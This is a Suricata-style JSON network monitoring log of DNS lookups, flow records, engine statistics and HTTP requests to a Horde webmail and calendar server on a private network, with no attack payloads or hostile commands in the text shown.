{"timestamp":"2020-02-29T00:02:40.000436+0000","flow_id":2191913624185226,"event_type":"flow","src_ip":"192.168.10.122","src_port":36276,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.567690+0000","end":"2020-02-28T23:57:38.678900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:41.000155+0000","event_type":"stats","stats":{"uptime":13813,"capture":{"kernel_packets":132655,"kernel_drops":0},"decoder":{"pkts":132655,"bytes":92034766,"invalid":180,"ipv4":131226,"ipv6":8,"ethernet":132655,"raw":0,"null":0,"sll":0,"tcp":126227,"udp":4805,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2674,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2690,"synack":2681,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1718,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2191,"failed_udp":106},"tx":{"http":4463,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2268}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2237,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53939,"memcap":0}}} {"timestamp":"2020-02-29T00:02:41.140036+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35317,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:41.420240+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:02:44.205072+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18534,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.228358+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25550,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:46.422892+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.754219+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1892,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.762300+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":225,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.771672+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.000764+0000","flow_id":758296490976534,"event_type":"flow","src_ip":"192.168.10.122","src_port":42304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:46.173334+0000","end":"2020-02-28T23:57:46.284674+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:47.047330+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344}} {"timestamp":"2020-02-29T00:02:47.196304+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.204147+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.376092+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.390279+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15738,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.528668+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58469,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:02:48.000399+0000","event_type":"stats","stats":{"uptime":13820,"capture":{"kernel_packets":132674,"kernel_drops":0},"decoder":{"pkts":132691,"bytes":92050316,"invalid":180,"ipv4":131262,"ipv6":8,"ethernet":132691,"raw":0,"null":0,"sll":0,"tcp":126258,"udp":4810,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2675,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2691,"synack":2682,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1720,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2192,"failed_udp":107},"tx":{"http":4465,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2269}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2239,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21821,"memcap_state":0,"memcap_global":0},"http":{"memuse":136750,"memcap":0}}} {"timestamp":"2020-02-29T00:02:51.772560+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18578,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.000469+0000","flow_id":1308142499499515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60747,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:51.757243+0000","end":"2020-02-28T23:57:51.868541+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.000920+0000","flow_id":1544885391843999,"event_type":"flow","src_ip":"192.168.10.122","src_port":54287,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:51.451231+0000","end":"2020-02-28T23:57:51.562559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.668193+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.668279+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:02:53.000849+0000","flow_id":248440938960222,"event_type":"flow","src_ip":"192.168.10.130","src_port":34696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":16,"pkts_toclient":22,"bytes_toserver":1621,"bytes_toclient":23106,"start":"2020-02-29T00:01:46.922974+0000","end":"2020-02-29T00:01:52.380357+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:55.000229+0000","event_type":"stats","stats":{"uptime":13827,"capture":{"kernel_packets":132775,"kernel_drops":0},"decoder":{"pkts":132777,"bytes":92092100,"invalid":180,"ipv4":131348,"ipv6":8,"ethernet":132777,"raw":0,"null":0,"sll":0,"tcp":126334,"udp":4820,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2678,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2694,"synack":2685,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1723,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2197,"failed_udp":107},"tx":{"http":4470,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2274}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":46973,"memcap":0}}} {"timestamp":"2020-02-29T00:02:56.692897+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:56.883709+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289}} {"timestamp":"2020-02-29T00:03:01.884497+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} 